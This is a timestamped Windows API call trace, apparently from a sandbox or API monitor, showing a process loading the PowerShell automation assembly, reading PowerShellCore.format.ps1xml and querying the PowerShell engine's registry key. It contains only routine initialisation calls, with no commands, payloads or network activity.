	[0351.668] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbbc0, lpBuffer=0x1cca80, dwLength=0x30 | out: lpBuffer=0x1cca80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.669] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.669] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.669] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.669] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf73ef522, Data2=0x10ec, Data3=0x4868, Data4=([0]=0x8f, [1]=0x7e, [2]=0x1e, [3]=0xb8, [4]=0x9c, [5]=0xc3, [6]=0x8b, [7]=0xee))) returned 0x0
	[0351.669] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xac48169e, Data2=0x18f3, Data3=0x4a52, Data4=([0]=0xaf, [1]=0x30, [2]=0xc6, [3]=0xa9, [4]=0x65, [5]=0xaa, [6]=0x58, [7]=0x40))) returned 0x0
	[0351.669] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x877b9062, Data2=0x650b, Data3=0x4d86, Data4=([0]=0xbf, [1]=0x66, [2]=0xdd, [3]=0x1d, [4]=0x52, [5]=0x63, [6]=0xe2, [7]=0xa2))) returned 0x0
	[0351.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.670] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xecf9893, Data2=0x685a, Data3=0x4d4b, Data4=([0]=0x8f, [1]=0x52, [2]=0xeb, [3]=0x43, [4]=0x3d, [5]=0x5f, [6]=0xd5, [7]=0xe2))) returned 0x0
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.672] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x3823f45, Data2=0x1a21, Data3=0x48c5, Data4=([0]=0x9d, [1]=0xa0, [2]=0xc8, [3]=0xcf, [4]=0x2, [5]=0x14, [6]=0x8f, [7]=0x2))) returned 0x0
	[0351.672] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.672] VirtualQuery (in: lpAddress=0x1cbd60, lpBuffer=0x1ccc20, dwLength=0x30 | out: lpBuffer=0x1ccc20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.672] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x177b3c99, Data2=0x7505, Data3=0x407d, Data4=([0]=0xa5, [1]=0xaf, [2]=0xac, [3]=0x43, [4]=0x74, [5]=0xdd, [6]=0x18, [7]=0xa0))) returned 0x0
	[0351.672] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x7e405815, Data2=0x7a2, Data3=0x4241, Data4=([0]=0xab, [1]=0xf, [2]=0x3c, [3]=0xcd, [4]=0xd, [5]=0x24, [6]=0x79, [7]=0xfc))) returned 0x0
	[0351.672] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd740a0ee, Data2=0x6954, Data3=0x44f2, Data4=([0]=0x93, [1]=0x49, [2]=0x56, [3]=0x27, [4]=0xa3, [5]=0x2f, [6]=0x51, [7]=0x3c))) returned 0x0
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0351.673] SetErrorMode (uMode=0x1) returned 0x1
	[0351.673] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0351.674] GetFileType (hFile=0x320) returned 0x1
	[0352.145] SetErrorMode (uMode=0x1) returned 0x1
	[0352.145] GetFileType (hFile=0x320) returned 0x1
	[0352.145] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.148] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.148] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.148] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.150] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.151] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.151] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.151] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0352.151] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0xe67, lpOverlapped=0x0) returned 1
	[0352.151] ReadFile (in: hFile=0x320, lpBuffer=0x2f6554f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f6554f*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0352.151] ReadFile (in: hFile=0x320, lpBuffer=0x2f65f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x2f65f80*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0352.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0352.152] SetErrorMode (uMode=0x1) returned 0x1
	[0352.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0352.152] SetErrorMode (uMode=0x1) returned 0x1
	[0352.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0352.152] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x320) returned 0x0
	[0352.152] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0352.152] CoTaskMemAlloc (cb=0x5a) returned 0x46ed50
	[0352.152] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x46ed50, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0352.152] CoTaskMemFree (pv=0x46ed50) 
	[0352.152] RegCloseKey (hKey=0x320) returned 0x0
